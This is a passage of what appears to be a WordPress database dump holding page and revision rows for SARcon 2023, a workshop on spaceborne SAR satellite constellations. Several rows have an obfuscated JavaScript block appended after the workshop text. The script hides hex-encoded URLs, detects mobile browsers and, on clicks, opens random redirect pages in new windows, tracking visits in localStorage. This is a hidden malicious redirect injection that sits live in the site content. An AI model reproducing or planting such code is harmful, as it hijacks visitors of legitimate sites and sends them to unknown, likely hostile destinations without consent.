_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SARcon 2023 - SAR constellations and applications','','publish','closed','closed','','sarcon-2023-sar-constellations-and-applications','','','2023-02-14 04:24:03','2023-02-14 04:24:03','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=2736',0,'dt_portfolio','',0),
(2737,1,'2022-10-13 16:12:59','2022-10-13 16:12:59','','Untitled-1','','inherit','open','closed','','untitled-1','','','2022-10-13 16:12:59','2022-10-13 16:12:59','',2736,'https://gsw2023.com/wp-content/uploads/2022/10/Untitled-1.jpg',0,'attachment','image/jpeg',0),
(2738,1,'2022-10-13 16:13:17','2022-10-13 16:13:17','','SARcon 2023 - SAR constellations and applications','','inherit','closed','closed','','2736-revision-v1','','','2022-10-13 16:13:17','2022-10-13 16:13:17','',2736,'https://gsw2023.com/?p=2738',0,'revision','',0),
(2739,1,'2022-10-13 16:30:37','2022-10-13 16:30:37','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Spaceborne synthetic aperture radar satellites are nowadays often developed in constellations of two or more satellites providing faster revisit times. Other innovative constellation and SAR concepts include geosynchronous SAR systems and non-sun-synchronous orbits for special applications. In this context, SARcon aims to provide a unique forum for professionals involved in spaceborne synthetic aperture system design and application development to share research ideas, present latest achievements, foster cooperation, and encourage international collaboration. The workshop will have two days of technical program, including plenary sessions and invited papers. Contributions will be invited from researchers and participant from ISPRS society in general, including topics on SAR satellite system design, applications in interferometry and tomography, bi- and multi-static SAR and present and upcoming SAR constellations.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SARcon 2023 - SAR constellations and applications','','inherit','closed','closed','','2736-revision-v1','','','2022-10-13 16:30:37','2022-10-13 16:30:37','',2736,'https://gsw2023.com/?p=2739',0,'revision','',0),
(2740,1,'2022-10-13 16:37:06','2022-10-13 16:37:06','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Spaceborne synthetic aperture radar satellites are nowadays often developed in constellations of two or more satellites providing faster revisit times. Other innovative constellation and SAR concepts include geosynchronous SAR systems and non-sun-synchronous orbits for special applications. In this context, SARcon aims to provide a unique forum for professionals involved in spaceborne synthetic aperture system design and application development to share research ideas, present latest achievements, foster cooperation, and encourage international collaboration. The workshop will have two days of technical program, including plenary sessions and invited papers. Contributions will be invited from researchers and participant from ISPRS society in general, including topics on SAR satellite system design, applications in interferometry and tomography, bi- and multi-static SAR and present and upcoming SAR constellations.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row][vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Themes of event:</strong></h5>\n<h6 style=\"text-align:justify; color:black;\"><strong>⦁ Discussion on new SAR satellite constellations for bi-static and mono-static pursuit pairs</strong><br />\n<strong>⦁ Non-sun-synchronous orbits for new applications</strong><br />\n<strong>⦁ Geosynchronous SAR</strong><br />\n<strong>⦁ Innovative applications of SAR and of data from SAR constellations</strong><br />\n<strong>⦁ DEM/DSM and global DEM generation techniques and applications</strong><br />\n<strong>⦁ Surface motion estimation from SAR</strong><br />\n<strong>⦁ SAR for surveillance and security related applications</strong></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( 